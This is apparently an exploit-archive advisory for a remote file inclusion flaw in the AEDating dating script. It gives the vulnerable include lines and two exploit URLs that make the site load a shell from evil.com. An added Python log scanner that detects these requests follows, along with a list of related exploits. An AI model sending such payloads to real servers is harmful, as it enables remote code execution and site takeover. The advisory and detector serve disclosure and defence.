AEDating (all versions) Remote File Inclusion.

Vulnerable code:
/inc/design.inc.php
/inc/admin_design.inc.php

require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]prof.inc.php" );

Exploit:
http://site.com/[script_path]/inc/design.inc.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/admin_design.inc.php?dir[inc]=http://evil.com/shell.txt ?

Video:
http://rapidshare.de/files/33316468/AEDating_SQL.rar.html
http://www.megaupload.com/?d=O1W4DX97

# milw0rm.com [2006-09-16]
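
A log check for the request pattern shown under "Exploit", as an added example that is not part of the original advisory: it flags requests to the two listed include files whose dir[inc] parameter carries a remote URL, in both literal and percent-encoded form. The combined access-log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# The two include files the advisory lists as vulnerable.
VULN_SCRIPTS = ("/inc/design.inc.php", "/inc/admin_design.inc.php")
# A dir[inc] value that starts with a URL scheme points off-host.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?)://", re.I)
# Request field of a combined-log-format line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def rfi_attempt(log_line):
    """Return the remote dir[inc] value if the line matches, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not unquote(url.path).lower().endswith(VULN_SCRIPTS):
        return None
    # parse_qsl percent-decodes, so dir%5Binc%5D is seen as dir[inc].
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if key == "dir[inc]" and REMOTE_SCHEME.match(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, remote_value) for every flagged line."""
    hits = []
    for line in lines:
        value = rfi_attempt(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits

# Constructed sample lines (documentation IPs and hostnames, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Sep/2006:10:00:01 +0000] "GET /aedating/inc/design.inc.php'
    '?dir[inc]=http://attacker.example/s.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [16/Sep/2006:10:00:05 +0000] "GET /aedating/inc/admin_design.inc.php'
    '?dir%5Binc%5D=http%3A%2F%2Fattacker.example%2Fs.txt%3F HTTP/1.0" 200 498',
    '192.0.2.12 - - [16/Sep/2006:10:01:00 +0000] "GET /aedating/index.php'
    '?page=search HTTP/1.1" 200 8841',
    '192.0.2.13 - - [16/Sep/2006:10:02:00 +0000] "GET /aedating/inc/design.inc.php'
    '?dir[inc]=inc/ HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"possible RFI attempt from {ip}: dir[inc]={value}")
```
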
Related Exploits
Trying to match CVEs (1): CVE-2006-4870
Trying to match OSVDBs (2): 28923, 28924
Other Possible E-DB Search Terms: aeDating 4.1, aeDating
Date | Title | Author |
---|---|---|
2005-09-15 | AEwebworks aeDating 3.2/4.0 - 'search_result.php' SQL Injection | alexsrb |
2006-09-04 | FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion | NeXtMaN |